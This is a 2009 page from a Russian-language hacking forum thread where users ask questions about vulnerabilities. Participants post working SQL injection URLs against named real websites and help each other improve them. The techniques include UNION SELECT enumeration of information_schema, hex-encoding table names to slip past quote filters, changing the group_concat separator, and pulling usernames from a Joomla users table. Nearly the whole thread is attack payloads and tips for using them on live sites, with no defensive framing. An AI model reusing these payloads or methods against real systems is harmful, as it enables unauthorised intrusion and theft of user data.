FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 510 из 2422

510

Опции темы

Поиск в этой теме

Опции просмотра

29.01.2009, 13:11

je0n

Постоянный

Регистрация: 14.05.2006

Сообщений: 334

Провел на форуме:
1543521

Репутация: 272

Отправить сообщение для je0n с помощью ICQ

ага) а как разделить сменить на <br>
так получается

Код:

http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+0x3b),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--

а так нет

Код:

http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+char(60,98,114,62)),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--

29.01.2009, 13:16

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Так тебе нужно?
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=1789 7669898768+union+select+1,2,3,4,group_concat(conca t_ws(0x3a,table_name,column_name)+separator+0x3C62 723E),6,7,8,9,10,11,12,13,14,15+from+information_s chema.columns--

29.01.2009, 13:45

je0n

Постоянный

Регистрация: 14.05.2006

Сообщений: 334

Провел на форуме:
1543521

Репутация: 272

Да, это! спасибо!

уммммм,хотелось бы посмотреть как выводить данные по кускам, ибо limit здесь не работает

пробовал substring в запросе - не прокатывает. Почитал о чем эти говорят:
http://forum.antichat.ru/threadnav46016-495-10.html (и предыдущая страница)
выводить только на первую букву тоже не катит если очень большая или мальенькая БД

а о чем еще способ, который предложил l1ght я вообще не вдуплю.
Есть какие предложения?

29.01.2009, 16:41

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

je0n, а что там не понятного? смотри, например, в таблице users n записей:
Админ,Бобик,Вовик,Гогик,Дод ик...
предположим group_concat(users) выводит три записи
Админ,Бобик,Вовик
ставим условие where users>'Вовик' (или 0xВовик) => выводится следущие три записи в алфавитном порядке

Ghost0ff,

Цитата:

http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x6a6f735f7573657273--+

select hex('jos_users')
http://k0x.ru/encoder/index.php 1 строчка

Последний раз редактировалось l1ght; 29.01.2009 в 16:52..

29.01.2009, 16:38

Ghost0ff

Новичок

Регистрация: 18.11.2008

Сообщений: 28

Провел на форуме:
109973

Репутация: 15

Отправить сообщение для Ghost0ff с помощью ICQ

http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,column_name+from+information_sche ma.columns+where+table_name='jos_users'/* не показывает колонки в табле чо делать?

29.01.2009, 16:41

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Код:

http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x6A6F735F7573657273/*

Скачать кодировщик

Последний раз редактировалось Pashkela; 29.01.2009 в 17:09..

29.01.2009, 16:50

Ghost0ff

Новичок

Регистрация: 18.11.2008

Сообщений: 28

Провел на форуме:
109973

Репутация: 15

хм. Я в случае не отображения ставил md5 тоесть 'jos_users' шифровал и подставлял 0xдалее зашифрованное 'jos_users' в какой шифровке вы это мутите?

29.01.2009, 16:57

groundhog

Познавший АНТИЧАТ

Регистрация: 12.05.2007

Сообщений: 1,235

Провел на форуме:
2238549

Репутация: 1318

Отправить сообщение для groundhog с помощью ICQ

Ghost0ff, при чём тут MD5? Если кавычки фильтруются, то это обходится с помощью 0xZZZZZZZZ, где Z-представление каждого байта слова в шестнадцатиричном эквиваленте... То есть для jos_users (без кавычек) это 0x6A6F735F7573657273

29.01.2009, 17:03

Ghost0ff

Новичок

Регистрация: 18.11.2008

Сообщений: 28

Провел на форуме:
109973

Репутация: 15

Все, понял. Спасибо за толковое описание ) трабла №2: http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,username+from+jos_users/* не отображает (Хочу за 1 раз забать все вопросы меня интересующие)
P.S. эти 2 вопроса меня мучали пол жизни

#10

29.01.2009, 17:08

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Определяем БД, где таблица jos_users:

Код:

http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,table_schema+from+information_schema.columns+where+table_name=0x6A6F735F7573657273/*

А теперь правильно забираем данные:

Код:

http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,username+from+test.jos_users/*

Страница 510 из 2422

510

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход

ANTICHAT.XYZ